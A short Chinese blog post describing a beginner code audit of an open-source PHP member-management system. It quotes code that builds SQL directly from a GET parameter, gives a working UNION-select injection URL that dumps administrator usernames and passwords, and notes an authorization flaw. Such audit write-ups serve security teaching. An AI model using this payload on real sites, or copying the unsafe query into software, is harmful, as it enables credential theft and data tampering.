freebuf
本文来源:i_春秋
这段时间在想着做个高校的会员管理系统,所以在chrome上装了个掘金插件,今天发现日推推了个类似的PHP写的小程序
本着能省就省,有自行车还造什么轮子的原则
于是乎
git clone https://github.com/chaodada/member.git经过简单的部署后算是能打开了
后台UI做的真心差评
然后简单的看了下代码,发现几个SQL注入和一个越权
SQL注入
程序使用PDO连接数据库,后台使用了预编译SQL指令,没多大问题
看看前台用户处
xiu.php
if (isset($_GET['id'])) { $sql = "select id,username,password,integral,**,email from u_users WHERE 1=1 and id={$_GET['id']} "; $res = $pdo->query($sql); list($id, $username, $password, $integral, $**, $email) = $res->fetch(PDO::FETCH_NUM); }很明显的GET型注入
爆管理员密码的payload:
http://localhost/member-master/member-master/user/xiu_user.php?id=-37 union select 1,2,group_concat(username,0x2a,password,0x20,mpw),4,5,6 from memsystem.u_admin %23
越权
同样还是刚才那个位置
id修改后即可更改任意用户信息
总结
这套程序距离实用还有不小的距离 适合入门级选手审计练手
程序下载地址:https://github.com/chaodada/member.git
转载请注明来自网盾网络安全培训,本文标题:《记一次简单的代码审计》
标签:代码审计
- 上一篇: 网络信息安全中最热门的果然是它
- 下一篇: xss挖掘初上手
